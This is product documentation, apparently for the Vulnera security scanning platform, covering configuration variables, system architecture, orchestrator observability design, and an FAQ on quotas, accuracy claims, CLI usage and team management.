  • VULNERA__LLM__OPENAI__BASE_URL — Custom endpoint (for Ollama, vLLM, etc.)
  • VULNERA__LLM__OPENAI__ORGANIZATION_ID — Organization ID

Recommended models: gpt-4, gpt-4-turbo, gpt-3.5-turbo

Azure OpenAI

  • AZURE_OPENAI_KEY — Azure API key
  • VULNERA__LLM__AZURE__ENDPOINT — Azure resource endpoint
  • VULNERA__LLM__AZURE__DEPLOYMENT — Deployment name
  • VULNERA__LLM__AZURE__API_VERSION — API version (default: 2024-02-15-preview)

Resilience Settings

  • VULNERA__LLM__RESILIENCE__ENABLED — Enable circuit breaker + retry (default: true)
  • VULNERA__LLM__RESILIENCE__MAX_RETRIES — Max retry attempts (default: 3)
  • VULNERA__LLM__RESILIENCE__INITIAL_BACKOFF_MS — Initial backoff delay in ms (default: 500)
  • VULNERA__LLM__RESILIENCE__MAX_BACKOFF_MS — Maximum backoff delay in ms (default: 30000)
  • VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_THRESHOLD — Failures before circuit opens (default: 5)
  • VULNERA__LLM__RESILIENCE__CIRCUIT_BREAKER_TIMEOUT_SECS — Seconds before circuit recovery (default: 60)
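The settings above give the retry count and the backoff bounds but not the growth factor; assuming the common exponential-doubling policy (an assumption, not confirmed here), the resulting delay schedule would look like:

```python
def backoff_schedule(max_retries: int = 3, initial_ms: int = 500, max_ms: int = 30_000) -> list[int]:
    """Delay before each retry, assuming exponential doubling capped at max_ms.

    Defaults mirror MAX_RETRIES, INITIAL_BACKOFF_MS, and MAX_BACKOFF_MS above.
    """
    return [min(initial_ms * 2 ** attempt, max_ms) for attempt in range(max_retries)]

print(backoff_schedule())  # with the defaults: [500, 1000, 2000]
```

With the defaults, the circuit breaker then opens after 5 consecutive failures and stays open for 60 seconds before allowing a recovery probe.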

Enrichment Settings

  • VULNERA__LLM__ENRICHMENT__MAX_FINDINGS_TO_ENRICH — Max findings to enrich (default: 10)
  • VULNERA__LLM__ENRICHMENT__MAX_CONCURRENT_ENRICHMENTS — Concurrent enrichment calls (default: 3)
  • VULNERA__LLM__ENRICHMENT__INCLUDE_CODE_CONTEXT — Include code in prompts (default: true)
  • VULNERA__LLM__ENRICHMENT__MAX_CODE_CONTEXT_CHARS — Max code snippet length (default: 2000)

Sandbox Configuration

The sandbox provides secure isolation for SAST and secrets detection modules.

  • VULNERA__SANDBOX__ENABLED — Enable sandboxing (default: true)
  • VULNERA__SANDBOX__BACKEND — Sandbox backend, see below (default: landlock)
  • VULNERA__SANDBOX__FAILURE_MODE — Sandbox setup behavior (default: best_effort)
  • VULNERA__SANDBOX__EXECUTION_TIMEOUT_SECS — Execution timeout in seconds (default: 30)
  • VULNERA__SANDBOX__MEMORY_LIMIT_MB — Memory limit, process backend (default: 256)

Sandbox Backends

  • landlock — Kernel-level isolation (requires Linux 5.13+)
  • auto — Auto-detect best backend (Linux/non-Linux)
  • process — Fork-based isolation (any Linux)
  • noop — Disable sandboxing (not recommended)

Landlock provides near-zero-overhead isolation via the Linux kernel’s Landlock security module.

Failure modes:

  • best_effort — Continue analysis if sandbox setup degrades
  • fail_closed — Abort module execution if sandbox setup fails

Cache Configuration

  • VULNERA__CACHE__DRAGONFLY_URL — Redis/Dragonfly URL (optional)
  • VULNERA__CACHE__DEFAULT_TTL_SECS — Default cache TTL in seconds (default: 3600)

Example Configuration

Minimal (Development)

DATABASE_URL='postgresql://localhost/vulnera'
VULNERA__AUTH__JWT_SECRET='dev-secret-key-at-least-32-chars!'
GOOGLE_AI_KEY='your-api-key'

Production

DATABASE_URL='postgresql://user:pass@db.example.com:5432/vulnera'
VULNERA__AUTH__JWT_SECRET='production-secret-minimum-32-chars!'
VULNERA__CACHE__DRAGONFLY_URL='redis://cache.example.com:6379'

# LLM
VULNERA__LLM__PROVIDER='google_ai'
GOOGLE_AI_KEY='your-production-key'
VULNERA__LLM__RESILIENCE__ENABLED=true

# Sandbox
VULNERA__SANDBOX__ENABLED=true
VULNERA__SANDBOX__BACKEND='landlock'
VULNERA__SANDBOX__FAILURE_MODE='best_effort'

# Server
VULNERA__SERVER__ENABLE_DOCS=false
VULNERA__SERVER__CORS_ORIGINS='https://vulnera.studio'

System Architecture (Advanced Reference)

This section provides technical details about Vulnera’s architecture for developers, integrators, and operators who need deeper understanding.

Overview

Vulnera is a modular, async Rust platform using domain-driven design (DDD) principles with a composition root wiring pattern.

┌─────────────────────────────────────────────────────────────┐
│                        HTTP Server                           │
│                   (Axum Web Framework)                       │
└──────────────────────────┬──────────────────────────────────┘
                           │
┌──────────────────────────┴──────────────────────────────────┐
│                    Orchestrator                              │
│        (Async Job Queue + Module Registry)                   │
├───────────────┬──────────────┬─────────────┬────────────────┤
│               │              │             │                │
▼               ▼              ▼             ▼                ▼
Dependencies  SAST         Secrets        API            LLM
Analysis      Analysis     Detection     Analysis       Explanations
(Manifests)   (AST rules)  (Patterns)    (OpenAPI)      (Gemini)

Layered Architecture

Vulnera follows domain-driven design with four layers:

1. Domain Layer

Pure types, entities, traits—zero side effects

  • module.rs — AnalysisModule trait (all modules implement)
  • errors.rs — Domain error types
  • findings.rs — Finding entity and value objects
  • config.rs — Configuration value objects
  • repository.rs — Repository trait definitions

Key traits:

  • AnalysisModule — All modules (deps, SAST, secrets, API, LLM) implement this
  • IRepository — Abstract data access
  • ICache — Cache abstraction (Dragonfly/Redis only)
  • IAuthenticator — Authentication logic

2. Application Layer

Use cases orchestrating domain logic

  • create_analysis_job.rs — Initialize analysis job
  • execute_analysis_job.rs — Run analysis modules
  • enrich_findings_with_llm.rs — Add LLM explanations
  • Repository implementations for data access

Key characteristics:

  • Specific use cases (business logic)
  • Coordinates between domain and infrastructure
  • Returns domain entities (not DTOs)

3. Infrastructure Layer

HTTP clients, database queries, file I/O, parsers

  • database/ — SQLx compile-time validated SQL queries
  • parsers/ — AST parsing, manifest parsers
  • api_clients/ — OSV, NVD, GHSA, GitHub, and LLM provider clients
  • cache/ — Dragonfly/Redis caching, compression
  • auth/ — JWT and API key handling

Key characteristics:

  • All external communication
  • Wrapped with circuit breakers and retry logic
  • Configurable via Config struct

4. Presentation Layer

Controllers, routes, DTOs

  • controllers/ — HTTP handlers
  • models.rs — Request/response DTOs with OpenAPI annotations
  • routes.rs — Route registration

Module System

The Five Analysis Modules

Each implements the AnalysisModule trait:

  1. Dependencies — Package registry lookups (OSV, NVD, GHSA)
  2. SAST — AST-based code analysis (tree-sitter)
  3. Secrets — Regex pattern + entropy detection
  4. API — OpenAPI 3.x specification analysis
  5. LLM — Configured provider (Google Gemini, OpenAI, or Azure OpenAI) for explanations/fixes

Module Selection (Rule-Based)

Input: /path/to/project
  ├─ package.json found → Run Dependencies
  ├─ .py/.js files found → Run SAST (language-specific)
  ├─ All files scanned → Run Secrets
  ├─ openapi.yaml found → Run API
  └─ All findings → Optionally enrich with LLM
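The rule-based selection above can be sketched as a small pure function. This is a hypothetical illustration: the marker sets, extensions, and the `select_modules` name are ours, not Vulnera's actual internals.

```python
from pathlib import PurePosixPath

# Illustrative markers; Vulnera supports more ecosystems than listed here.
MANIFESTS = {"package.json", "Cargo.toml", "requirements.txt", "go.mod"}
CODE_EXTS = {".py", ".js", ".ts", ".rs", ".go", ".c", ".cpp"}

def select_modules(paths):
    names = {PurePosixPath(p).name for p in paths}
    exts = {PurePosixPath(p).suffix for p in paths}
    modules = ["secrets"]                       # all text files are scanned
    if names & MANIFESTS:
        modules.append("dependencies")          # manifest/lockfile present
    if exts & CODE_EXTS:
        modules.append("sast")                  # language-specific rules
    if {"openapi.yaml", "openapi.json"} & names:
        modules.append("api")
    return modules
```

A project containing `package.json`, a `.py` source file, and `openapi.yaml` would select all four detection modules; LLM enrichment is then applied (optionally) to the aggregated findings, never as part of selection.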

Data Flow: Full Analysis Job

HTTP POST /api/v1/analyze/job
  │
  ├─→ [Auth middleware] ← Validate API key or JWT
  │
  ├─→ [Rate limiter] ← Check quota (token-based)
  │
  ├─→ [Create job use case]
  │   ├─ Validate input
  │   ├─ Create Job in database
  │   └─ Push to Dragonfly job queue
  │
  ├─→ [Worker pool] (async, configurable max_job_workers)
  │   ├─ Dequeue job
  │   ├─ Download/access source (git, S3, local)
  │   ├─ Detect project type → Module selector
  │   ├─ Run selected modules in parallel
  │   │   ├─ Dependencies: concurrent registry lookups
  │   │   ├─ SAST: concurrent file analysis
  │   │   ├─ Secrets: concurrent file scanning
  │   │   └─ API: parse OpenAPI spec
  │   ├─ Aggregate findings
  │   └─ Persist to database
  │
  └─→ Return: Job ID + status (or stream if still processing)

Concurrency Model

Tokio async runtime with configurable thread pools:

[analysis]
max_job_workers = 8              # Worker pool size
max_concurrent_packages = 8       # Per-job package lookups
max_concurrent_registry_queries = 10
max_concurrent_api_calls = 12
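Caps like `max_concurrent_registry_queries` bound fan-out with a semaphore-style limiter. A minimal asyncio sketch, assuming a stand-in for the real registry HTTP call:

```python
import asyncio

# Sketch of bounded fan-out; the sleep is a placeholder for a network call.
async def lookup_all(packages, max_concurrent=10):
    sem = asyncio.Semaphore(max_concurrent)

    async def lookup(pkg):
        async with sem:                 # at most max_concurrent in flight
            await asyncio.sleep(0)      # placeholder for the registry query
            return (pkg, [])            # (package, advisories found)

    return await asyncio.gather(*(lookup(p) for p in packages))
```

`asyncio.gather` preserves input order, so aggregated results line up with the requested package list regardless of completion order.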

Concurrency impact:

  • Without concurrency: 50 packages → 50 × 2s = 100 seconds
  • With 8 concurrent workers: 50 packages → 6-12 seconds
  • With caching: 50 packages (50% cached) → 3-6 seconds
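The timings above can be approximated with a back-of-envelope model. The 2 s average per registry lookup is an assumption for illustration, not a measured Vulnera constant:

```python
import math

# Coarse model: uncached lookups drain in waves of `workers` at a time.
def estimated_seconds(packages, workers=1, per_lookup_s=2.0, cache_hit_rate=0.0):
    uncached = math.ceil(packages * (1 - cache_hit_rate))
    batches = math.ceil(uncached / workers)
    return batches * per_lookup_s
```

With these assumptions, 50 sequential lookups take 100 s, 8 workers cut that to about 14 s, and a 50% cache hit rate to about 8 s, in the same ballpark as the measured ranges above.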

Cache Architecture

Two-level caching with Dragonfly/Redis:

L1: In-Memory (100MB, 5-min TTL, optional compression)
      ↓ (miss)
L2: Dragonfly/Redis (24-hour TTL, 10KB compression threshold)
      ↓ (miss)
External: OSV, NVD, GHSA, GitHub, LLM provider APIs

Configuration:

[cache]
ttl_hours = 24
l1_cache_size_mb = 100
l1_cache_ttl_seconds = 300
enable_cache_compression = true
compression_threshold_bytes = 10240
dragonfly_url = "redis://127.0.0.1:6379"
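The L1/L2 lookup and the compression threshold can be sketched as follows. This is a toy in-memory model; the real implementation lives in the infrastructure layer and talks to Dragonfly/Redis, not Python dicts:

```python
import time
import zlib

class TwoLevelCache:
    def __init__(self, l1_ttl_s=300, compress_over=10240):
        self.l1, self.l2 = {}, {}
        self.l1_ttl_s, self.compress_over = l1_ttl_s, compress_over

    def put(self, key, value: bytes):
        self.l1[key] = (time.monotonic(), value)
        if len(value) > self.compress_over:       # compression threshold
            self.l2[key] = ("z", zlib.compress(value))
        else:
            self.l2[key] = ("raw", value)

    def get(self, key):
        hit = self.l1.get(key)
        if hit and time.monotonic() - hit[0] < self.l1_ttl_s:
            return hit[1]                         # L1 hit
        entry = self.l2.get(key)
        if entry is None:
            return None                           # full miss: external API
        kind, payload = entry
        value = zlib.decompress(payload) if kind == "z" else payload
        self.l1[key] = (time.monotonic(), value)  # repopulate L1
        return value
```

Only payloads above the threshold are compressed, which keeps small advisory records cheap to read while shrinking large ones on the wire and on disk.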

Rate Limiting & Quota System

Token-based quota with Dragonfly backend:

GET request:          1 token
POST request:         2 tokens
Analysis operation:   3 tokens
LLM operation:        6 tokens

Tiers:

  • Unauthenticated: 10 tokens/day
  • API Key: 40 tokens/day
  • Organization: 48 tokens/day (shared)

Daily reset: UTC midnight
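The token accounting above reduces to simple arithmetic. A sketch with illustrative operation names (the costs and daily limits come from the tables above):

```python
COSTS = {"get": 1, "post": 2, "analysis": 3, "llm": 6}
DAILY_LIMITS = {"unauthenticated": 10, "api_key": 40, "organization": 48}

def remaining_after(tier: str, operations) -> int:
    spent = sum(COSTS[op] for op in operations)
    return DAILY_LIMITS[tier] - spent
```

For example, an API-key user who runs one analysis and two LLM enrichments spends 3 + 6 + 6 = 15 tokens, leaving 25 of the daily 40.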

Database Schema

PostgreSQL 12+ with SQLx compile-time validation:

Key tables:

  • users — User accounts, authentication
  • organizations — Team/organization grouping
  • organization_members — Role-based membership
  • persisted_job_results — Analysis findings (JSONB)
  • api_keys — SHA256-hashed API keys
  • subscription_limits — Quota tracking

Authentication & Authorization

JWT Flow

  1. User registers/logs in → JWT issued (httpOnly cookie)
  2. Middleware extracts JWT on each request
  3. Validates signature + expiry
  4. Injects user context into request
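Steps 2-3 (check the signature, then the expiry) can be illustrated with a toy HMAC-signed token. A real deployment uses proper JWTs and a vetted library, not this sketch:

```python
import base64
import hashlib
import hmac
import json
import time

def sign(payload: dict, secret: bytes) -> str:
    body = base64.urlsafe_b64encode(json.dumps(payload).encode()).decode()
    sig = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"

def verify(token: str, secret: bytes):
    body, sig = token.rsplit(".", 1)
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return None                             # bad signature
    payload = json.loads(base64.urlsafe_b64decode(body))
    if payload.get("exp", 0) < time.time():
        return None                             # expired
    return payload                              # injected as user context
```

Note the constant-time comparison (`hmac.compare_digest`) and the order of checks: a forged signature is rejected before any claims are trusted.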

API Key Flow

  1. User creates API key → key returned once (never shown again)
  2. Stored as SHA256 hash in database
  3. Each request: Lookup hash, verify, use associated user
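The flow above means only a SHA-256 digest is ever persisted; requests are matched by re-hashing the presented key. A minimal sketch with a dict standing in for the database table:

```python
import hashlib
import secrets

def create_api_key(store: dict, user: str) -> str:
    plaintext = secrets.token_urlsafe(32)       # shown to the user once
    digest = hashlib.sha256(plaintext.encode()).hexdigest()
    store[digest] = user                        # hash only, never plaintext
    return plaintext

def authenticate(store: dict, presented: str):
    return store.get(hashlib.sha256(presented.encode()).hexdigest())
```

Because the hash is one-way, a database leak does not expose usable API keys.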

RBAC (Role-Based Access Control)

  • Owner: Full access, billing, member management
  • Admin: Create jobs, manage members, view analytics
  • Analyst: Create jobs, view results, comment
  • Viewer: View-only access
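The four roles above form a simple permission lattice. A sketch with illustrative action names (these are ours, not Vulnera's actual authorization vocabulary):

```python
# Each role's permissions, derived from the descriptions above.
ROLE_ACTIONS = {
    "viewer": {"view"},
    "analyst": {"view", "create_job", "comment"},
    "admin": {"view", "create_job", "comment", "manage_members",
              "view_analytics"},
    "owner": {"view", "create_job", "comment", "manage_members",
              "view_analytics", "billing"},
}

def can(role: str, action: str) -> bool:
    return action in ROLE_ACTIONS.get(role, set())
```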

Security Model

Defense in depth:

  1. HTTPS + HSTS
  2. CORS (configurable allowed_origins)
  3. CSRF tokens (POST/PUT/DELETE)
  4. Rate limiting (stricter for auth endpoints)
  5. Input validation (SQLx prevents SQL injection)
  6. Output encoding (JSON serialization)
  7. No secrets in logs (sensitive fields marked)

Configuration System

Strongly-typed with environment overrides:

config/default.toml (defaults)
         ↓
Environment variables (override)
         ↓
Config struct (passed to services)

Pattern: VULNERA__SECTION__KEY=value
Example: VULNERA__AUTH__JWT_SECRET=mysecret
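The `VULNERA__SECTION__KEY` convention above can be sketched as a fold over environment variables. Real config loading also handles type coercion and nested sections, which this sketch skips:

```python
def apply_env_overrides(config: dict, env: dict) -> dict:
    for name, value in env.items():
        if not name.startswith("VULNERA__"):
            continue
        # VULNERA__AUTH__JWT_SECRET -> section "auth", key "jwt_secret"
        section, key = name[len("VULNERA__"):].lower().split("__", 1)
        config.setdefault(section, {})[key] = value
    return config
```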

Composition Root

Single entry point: src/app.rs

All services instantiated and wired:

1. Load config
2. Connect to external services (DB, cache, APIs)
3. Instantiate analysis modules
4. Register modules in ModuleRegistry
5. Spawn worker pool
6. Return OrchestratorState (passed to handlers)

Key principle: Never instantiate services inside module internals. Everything flows through OrchestratorState.

Performance Characteristics

Analysis speed (typical):

| Module | Time | Depends On |
|---|---|---|
| Secrets | 100ms/file | File size |
| SAST | 500ms/file | File complexity |
| API | 50ms/spec | Spec size |
| Dependencies | 1-10s/package | Registry latency |
| LLM | 1-5s/request | Provider API latency |

Deployment Models

Docker

FROM rust:1.91 AS builder
# Build Vulnera binary...

FROM debian:bookworm
COPY --from=builder /vulnera /usr/bin/
EXPOSE 3000
CMD ["vulnera"]

Kubernetes

  • Stateless API servers (replicate horizontally)
  • Shared PostgreSQL database
  • Shared Dragonfly cache
  • Shared job queue (Dragonfly)

Scaling Considerations

Horizontal: Add API server instances behind load balancer (all stateless)

Vertical: Tune max_job_workers and max_concurrent_* settings

Resource limits:

  • Memory: ~500MB base + job-dependent (~100MB per concurrent job)
  • CPU: Event-driven, peaks during concurrent analysis
  • Disk: Cache compression reduces storage


Orchestrator Observability Architecture

This document defines the observability architecture for the orchestration pipeline from job creation through module execution and lifecycle persistence.

Goals

  • Make orchestration failures actionable in production.
  • Preserve request/job context across async boundaries.
  • Keep logging structured and queryable.
  • Minimize hidden failure modes in state transitions.

Scope

Applies to:

  • CreateAnalysisJobUseCase
  • ExecuteAnalysisJobUseCase
  • JobWorkflow
  • Worker execution path in job_queue

Design Principles

  1. Context at boundaries

    • Every public use-case/workflow entrypoint must emit structured context at start and finish.
    • Required identifiers: job_id, project_id, module, and transition target when applicable.
  2. Error locality

    • Failures should be logged as close as possible to their source with operation-specific metadata.
    • Callers should receive typed errors; logs carry operational detail.
  3. State-machine visibility

    • Every job transition (Pending -> Queued -> Running -> Completed/Failed/Cancelled) must be visible in logs with reason and timing.
  4. Async fan-out accountability

    • Parallel module execution logs should expose:
      • module spawn
      • module completion/failure
      • aggregate completion counts
  5. No panic paths in orchestration

    • Runtime errors should not panic in production paths.

Event Model

Job Lifecycle Events

  • job.lifecycle.enqueue
  • job.lifecycle.start
  • job.lifecycle.complete
  • job.lifecycle.fail
  • job.lifecycle.cancel

Suggested fields:

  • job_id
  • project_id
  • status_from
  • status_to
  • reason
  • duration_ms (where applicable)
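One way to emit these lifecycle events as structured, queryable log lines (the field names follow the suggested list; the helper itself is illustrative):

```python
import json
import time

def lifecycle_event(name, job_id, project_id, status_from, status_to,
                    reason=None, started_at=None):
    event = {
        "event": f"job.lifecycle.{name}",
        "job_id": job_id,
        "project_id": project_id,
        "status_from": status_from,
        "status_to": status_to,
    }
    if reason is not None:
        event["reason"] = reason
    if started_at is not None:     # elapsed timing at the boundary
        event["duration_ms"] = int((time.monotonic() - started_at) * 1000)
    return json.dumps(event)
```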

Module Execution Events

  • job.module.spawn
  • job.module.complete
  • job.module.error
  • job.module.panic (unexpected task panic)

Suggested fields:

  • job_id
  • module
  • duration_ms
  • error

Instrumentation Strategy

  • Use #[instrument] on public async orchestration methods.
  • Use info for lifecycle milestones.
  • Use warn for degraded-but-continued paths.
  • Use error for failed operations and panics.
  • Include elapsed timing at operation boundaries for coarse latency tracking.

Operational Outcomes

With this architecture, operators can answer:

  • Which phase is failing most often?
  • Which module frequently exceeds expected runtime?
  • Which jobs failed due to transition/persistence errors vs module logic?
  • How long do jobs spend in each phase?

Future Extensions

  • Export spans to OpenTelemetry collector.
  • Add metrics counters/histograms aligned with event model.
  • Correlate webhook delivery outcomes with lifecycle events.

Frequently Asked Questions (FAQ)

Quick answers to common questions about Vulnera’s features, capabilities, and usage.

Quota & Rate Limiting

How much does analysis cost in tokens?

Each operation consumes tokens from your daily quota:

| Operation | Cost |
|---|---|
| Basic analysis | 3 tokens |
| LLM explanation | 6 tokens |
| Code fix generation | 6 tokens |
| LLM query | 6 tokens |

Example: A full analysis (3) + 2 LLM features (12) = 15 tokens total.

Reference: Quota & Pricing Guide

What’s the difference between API key tier and organization tier?

| Tier | Daily Limit | Use Case |
|---|---|---|
| Unauthenticated | 10 tokens | Testing, no auth |
| API Key | 40 tokens | Single integration |
| Organization | 48 tokens | Team usage, shared quota |

Team quota is pooled: if an org has 5 members, all members share the 48-token daily limit (no per-member quota).

Can I increase my quota?

Yes. Options:

  1. Organization tier — Upgrade to shared team quota (100 tokens/day)
  2. Premium plan — Contact Vulnera for higher limits
  3. On-premise — Deploy Vulnera privately with unlimited quota

What happens when I exceed my quota?

You receive a 429 Too Many Requests error.

Quota resets at 00:00 UTC every day.


Offline Capabilities

What can Vulnera analyze offline (without internet)?

| Module | Offline | Notes |
|---|---|---|
| SAST | ✅ Yes | AST pattern matching (Python, JS/TS, Rust, Go, C/C++) |
| Secrets | ✅ Yes | Regex patterns + entropy |
| API | ✅ Yes | OpenAPI schema analysis |
| Dependencies | ❌ No | Requires CVE database access |
| LLM | ❌ No | Requires the configured provider API |

CLI offline scan:

vulnera analyze --source ./my-project --modules sast,secrets,api
# No internet required

Can I use Vulnera without an internet connection?

Partial. The CLI can run offline scans for SAST, Secrets, and API analysis. Dependency scanning requires internet (to fetch CVE data from registries).


Analysis Accuracy & False Positives

Why do I have false positives in secret detection?

Common causes:

  1. Test/example secrets — Hardcoded in docs or tests

    • Fix: Add to .vulnera-ignore or use entropy baseline filters
  2. Placeholder values — Keys like YOUR_API_KEY_HERE

    • Fix: Entropy score filters exclude most placeholders
  3. High-entropy strings — Random tokens in logs

    • Fix: Configure entropy thresholds per secret type
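The entropy filters mentioned above compute a Shannon-entropy score per string. A sketch; the 4.0 bits/char threshold is illustrative, not Vulnera's actual default:

```python
import math
from collections import Counter

# Shannon entropy in bits per character.
def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def looks_like_secret(s: str, threshold: float = 4.0) -> bool:
    return shannon_entropy(s) >= threshold
```

A placeholder like `YOUR_API_KEY_HERE` scores around 3.3 bits/char and is filtered out, while a random token with many distinct characters scores well above 4.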

False positive rate: <5% for high-confidence secrets (AWS keys, private certs)

Reference: Secrets Detection

How accurate is SAST analysis?

Detection rates:

| Vulnerability | Confidence | False Positives |
|---|---|---|
| SQL Injection | 95-98% | <3% |
| Cross-Site Scripting (XSS) | 93-97% | <4% |
| Command Injection | 92-95% | <5% |
| Hardcoded Secrets | 98%+ | <2% |

Limitation: Cannot detect business logic flaws or complex multi-step attacks.

Why didn’t Vulnera detect a vulnerability I know exists?

Possible reasons:

  1. Dynamic code patterns — Code generated at runtime

    • SAST analyzes the static AST; detecting runtime patterns requires dynamic analysis (a planned roadmap item)
  2. Complex data flow — Multi-step taint chains

    • Default taint depth is 3 hops; increase with --taint-depth=5
  3. Custom sanitizers — User-defined security functions not recognized

    • Configure in .vulnera.toml under sast.custom_sanitizers
  4. False negative filtering — Some detections suppressed to reduce noise

    • Enable with --analysis-depth=full

Reference: SAST Analysis


ML vs. LLM

What’s the difference between ML models and LLM features?

| Aspect | ML Models (Detection) | LLM Features (Explanation) |
|---|---|---|
| Purpose | Find vulnerabilities | Explain & fix vulnerabilities |
| Technology | Pattern matching, AST parsing, entropy | Google Gemini |
| Speed | <1 second | 3-10 seconds |
| Offline | ✅ Yes | ❌ No |
| Cost | 3 tokens | 6 tokens |
| Deterministic | ✅ Same input = same output | ❌ May vary slightly |

Are ML models proprietary?

Detection models (SAST, Secrets, API) are rule-based and open-source:

  • SAST: tree-sitter AST patterns (GitHub open-source)
  • Secrets: Entropy + regex patterns (public pattern fingerprints)
  • API: OpenAPI schema validation (OWASP standards)

LLM explanations use the configured provider (Google Gemini, OpenAI, or Azure OpenAI).

Can I use Vulnera without LLM features?

Yes. All detection modules work offline:

vulnera analyze --source . --modules sast,secrets,api,dependencies
# No LLM explanations, but full analysis completed

LLM is optional for:

  • Explanations (vulnera explain-finding <id>)
  • Code fixes (vulnera generate-fix <id>)
  • Natural language queries (vulnera query "How do I...?")

Customization

Can I customize SAST rules?

Yes, three ways:

  1. Update existing rules:

    # .vulnera.toml
    [sast.rule_overrides]
    SQL_INJECTION = { severity = "high", enabled = true }
    
  2. Add custom rules:

    # .vulnera/custom_rules.py
    @sast_rule("CUSTOM_XSS")
    def check_unescaped_output(node):
        """Check for unescaped user input in HTML templates"""
        # Custom pattern matching logic
    
  3. Disable noisy rules:

    [sast.disabled_rules]
    "LOW_ENTROPY_STRING" = true
    "COMMENTED_SECRET" = true
    

Reference: SAST Analysis

Can I filter out certain secret types?

Yes:

# .vulnera.toml
[secrets]
ignored_patterns = [
  "GITHUB_TOKEN_PLACEHOLDER",  # Exact string match
  "^test_.*",                   # Regex patterns
]

# Or ignore by file
ignored_files = [
  "docs/examples.md",
  "tests/fixtures/**"
]

Command line:

vulnera analyze . --secrets-ignore-patterns="test_,example_"

Integration

How do I integrate Vulnera into GitHub Actions?

name: Security Scan
on: [push, pull_request]

jobs:
  vulnera:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: vulnera-dev/vulnera-action@v1
        with:
          api-key: ${{ secrets.VULNERA_API_KEY }}
          analysis-depth: standard
          fail-on-severity: high

Reference: DevSecOps Quick Start

Can I scan S3 buckets?

Yes:

vulnera analyze --source s3://my-bucket/project \
  --aws-credentials-from-env

Requirements:

  • AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY environment variables
  • S3 bucket must have read access

Reference: Cloud Engineer Quick Start

Does Vulnera support enterprise deployments?

Yes, three options:

  1. SaaS (api.vulnera.studio) — Fully managed
  2. Self-hosted Docker — On your infrastructure
  3. Kubernetes helm chart — Enterprise clusters

Reference: Architecture - Deployment Models


Performance

How long does analysis take?

Typical times (standard depth):

| Source | Size | Time |
|---|---|---|
| Small repo (5K LOC) | <1 MB | 2-5 sec |
| Medium repo (50K LOC) | 5-10 MB | 10-30 sec |
| Large repo (800K LOC) | 50-100 MB | 1-5 min |

Optimization:

# Faster (minimal depth)
vulnera analyze . --analysis-depth=minimal  # 2-3 sec

# Slower (full depth)
vulnera analyze . --analysis-depth=full     # +2-3x time

Can I parallelize scanning?

Yes:

# Scan 10 repos in parallel
for repo in repo1 repo2 ... repo10; do
  vulnera analyze $repo --source-type=git &
done
wait

Concurrency limits:

  • CLI: Unlimited (your machine)
  • API: 50 concurrent jobs per organization
  • Jobs beyond the limit are queued and still respect rate limits

Organization & Teams

How do I share results with my team?

  1. Create organization:

    vulnera org create "My Team"
    
  2. Invite members:

    vulnera org members add teammate@company.com --role=analyst
    
  3. Run scan under organization:

    vulnera analyze . --org-id=<org-id>
    # Results visible to all org members
    

Reference: DevSecOps Quick Start

What are organization roles?

| Role | Permissions |
|---|---|
| Owner | Create/delete org, manage all settings, view all results |
| Admin | Invite members, configure scanning policies, view analytics |
| Analyst | Run scans, view results, generate reports |
| Viewer | View results only, read-only access |

Troubleshooting

Vulnera says “API Key not found” but I set VULNERA_API_KEY

Check:

echo $VULNERA_API_KEY  # Verify variable is set
vulnera auth status   # Check authentication

Possible causes:

  • API key is revoked
  • API key doesn’t have required organization access
  • Environment variable not exported (use export VULNERA_API_KEY=...)

Analysis returns empty results but I expect findings

Check:

  1. Verify modules are enabled:

    vulnera analyze . --modules=all --verbose
    # Should list sast, secrets, api, dependencies
    
  2. Lower analysis depth:

    vulnera analyze . --analysis-depth=full  # More aggressive
    
  3. Check file filter:

    vulnera analyze . --include-files="**/*.py,**/*.js"
    

LLM explanations are slow or timing out

Solutions:

  1. Increase timeout: vulnera config set llm.timeout=60
  2. Use organization tier for higher concurrency
  3. Request explanations asynchronously: vulnera explain --async

Dashboard & Web Platform

What is vulnera.studio?

Vulnera Studio (vulnera.studio) is the central web dashboard for managing vulnerability analysis, team collaboration, and security insights. It provides:

  • Personal Dashboard — View your scans and findings
  • Organization Management — Team collaboration with shared quotas
  • API Key Management — Generate keys for CLI and API access
  • Integrations — Connect GitHub, GitLab, Slack, webhooks
  • Analytics & Reporting — Track team metrics and generate compliance reports
  • Billing Management — Upgrade plans and manage subscriptions

Access: Visit https://vulnera.studio and sign in with your email.

Reference: Dashboard Guide

How do I create an organization?

Step-by-step:

  1. Log in to vulnera.studio
  2. Click + New Organization in sidebar
  3. Enter organization name, description, and logo (optional)
  4. Select plan tier (Free, Pro, Enterprise)
  5. Click Create — you’re now the owner

What you get:

  • Shared quota pool (e.g., 48 tokens/day for Free, 1000/month for Pro)
  • Team member management (invite/remove members)
  • Centralized reporting and analytics
  • Organization API keys for CI/CD

Reference: Organization Management

How do I invite team members?

Invite members to your organization:

  1. Go to Settings → Members
  2. Click Invite Member
  3. Enter email address(es) and select role:
    • Admin — Manage team, integrations, settings
    • Member — Create scans, resolve findings
    • Viewer — Read-only access (good for executives)
  4. Click Send Invitations
  5. Members receive email with join link

Roles & Permissions:

  • Owner — Full access, billing, delete organization
  • Admin — Members, settings, integrations (no billing)
  • Member — Create/view scans, resolve findings
  • Viewer — Read-only access to scans and reports

Reference: Team Collaboration

How do I generate an API key for the CLI?

Generate API key:

  1. Log in to vulnera.studio
  2. Go to Settings → API Keys
  3. Click Generate New Key
  4. Name the key (e.g., “GitHub Actions”, “Local Dev”)
  5. Set expiration (Never, 30 days, 90 days, 1 year)
  6. Click Create and copy immediately (not shown again)
  7. Store securely in your credential manager or CI/CD secrets

Use in CLI:

vulnera auth login --api-key YOUR_API_KEY

Use in GitHub Actions:

- name: Scan with Vulnera
  env:
    VULNERA_API_KEY: ${{ secrets.VULNERA_API_KEY }}
  run: vulnera analyze . --all-modules

Security: Rotate API keys every 90 days. Revoke unused keys immediately.

What’s the difference between personal and organization API keys?

| Aspect | Personal Key | Organization Key |
|---|---|---|
| Quota | 40 tokens/day (your own) | Shared org quota (48/day for Free, 1000 for Pro) |
| Access | Your scans only | All org members’ scans |
| Team | Individual | Shared across team |
| Use case | Local dev, personal projects | CI/CD, team automation |
